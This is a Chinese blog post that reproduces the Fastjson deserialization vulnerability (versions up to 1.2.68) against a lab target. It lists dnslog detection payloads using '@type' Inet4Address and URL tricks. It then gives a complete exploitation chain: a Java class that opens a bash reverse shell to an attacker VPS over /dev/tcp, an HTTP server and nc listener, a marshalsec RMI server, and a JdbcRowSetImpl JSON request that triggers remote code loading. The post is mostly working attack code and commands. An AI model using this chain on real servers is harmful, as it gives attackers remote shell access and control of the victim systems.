Fastjson反序列化复现

最新推荐文章于 2024-12-28 11:14:14 发布

不挖洞的鼹鼠

最新推荐文章于 2024-12-28 11:14:14 发布

阅读量268

点赞数

文章标签： java 前端服务器

本文链接：https://blog.youkuaiyun.com/2301_77315080/article/details/133755409

版权

1.启动靶场

2.漏洞影响

fastjson <= 1.2.68

3.检测漏洞

使用bp抓包，重发器更改抓包，GET改为POST包

{
	"zeo":{
    	"@type":"java.net.Inet4Address",
    	"val":"dnslog"
    	}
}

生成一个dnslog并查看Dnslog，回显表示有漏洞

Fastjson插件检测有漏洞

其他方法检测

{"@type":"java.lang.AutoCloseable"

{"rand1":{"@type":"java.net.InetAddress","val":"http://fastjson.fbi0tx.dnslog.cn"}}

{"rand2":{"@type":"java.net.Inet4Address","val":"http://fastjson.fbi0tx.dnslog.cn"}}

{"rand3":{"@type":"java.net.Inet6Address","val":"http://fastjson.fbi0tx.dnslog.cn"}}

{"rand4":{"@type":"java.net.InetSocketAddress"{"address":,"val":"http://fastjson.fbi0tx.dnslog.cn"}}}

{"rand5":{"@type":"java.net.URL","val":"http://fastjson.fbi0tx.dnslog.cn"}}

一些畸形payload，不过依然可以触发dnslog：

{"rand6":{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://fastjson.fbi0tx.dnslog.cn"}}""}}

{"rand7":Set[{"@type":"java.net.URL","val":"http://fastjson.fbi0tx.dnslog.cn"}]}

{"rand8":Set[{"@type":"java.net.URL","val":"http://fastjson.fbi0tx.dnslog.cn"}

{"rand9":{"@type":"java.net.URL","val":"http://fastjson.fbi0tx.dnslog.cn"}:0

看dnslog记录

4.漏洞利用

将如下代码保存为Exploit.java,代码中对应的vps地址换成自己的

import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStreamReader; public class Exploit{    public Exploit() throws Exception {        Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "bash -i >& /dev/tcp/VPS的IP/8888 0>&1"});        InputStream is = p.getInputStream();        BufferedReader reader = new BufferedReader(new InputStreamReader(is));         String line;        while((line = reader.readLine()) != null) {            System.out.println(line);        }         p.waitFor();        is.close();        reader.close();        p.destroy();    }     public static void main(String[] args) throws Exception {    }}

使用javac Exploit.java编译java文件生成Exploit.class

将Exploit.class文件和Exploit.java文件同时放在自己的vps上，并且在当前目录下使用如下命令开启一个轻量级的http服务

python3 -m http.server 8080 或者 python -m SimpleHTTPServer 8080

再开一个窗口，监听8888端口用作反弹shell监听：

nc -lvvp 8888

将marshalsec这个工具放在自己的vps上执行如下命令，启动rmi服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://vps:8080/#Exploit 9999

发送json到目标服务器(<=1.2.24)

POST / HTTP/1.1Host: targrtip:8090Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/jsonContent-Length: 160 {    "b":{        "@type":"com.sun.rowset.JdbcRowSetImpl",        "dataSourceName":"rmi://VPSip:9999/#Exploit",        "autoCommit":true    }    }

连接成功